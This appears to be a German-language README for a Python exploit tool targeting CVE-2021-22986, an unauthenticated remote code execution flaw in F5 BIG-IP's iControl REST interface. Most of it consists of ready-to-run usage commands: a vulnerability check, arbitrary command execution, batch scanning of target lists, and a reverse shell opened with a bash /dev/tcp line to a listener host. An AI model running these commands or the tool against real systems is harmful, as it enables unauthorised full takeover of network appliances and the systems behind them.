
CVE-2021-22986 & F5 BIG-IP RCE
Diese Sicherheitslücke ermöglicht es nicht authentifizierten Angreifern mit Netzwerkzugriff auf die iControl REST-Schnittstelle, über die BIG-IP-Verwaltungsschnittstelle und selbst zugeordnete IP-Adressen, beliebige Systembefehle auszuführen, Dateien zu erstellen oder zu löschen und Dienste zu deaktivieren. Diese Schwachstelle kann nur über die Control Plane ausgenutzt werden und nicht über die Data Plane. Die Ausnutzung kann zur vollständigen Kompromittierung des Systems führen. Das BIG-IP-System im Appliance-Modus ist ebenfalls anfällig.
Grundlegende Verwendung
python3 CVE_2021_22986.py

Schwachstellenprüfung
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

Befehl ausführen:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

Batch-Scan
python3 CVE_2021_22986.py -s true -f check.txt

Reverse Shell
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164

https://support.f5.com/csp/article/K03009991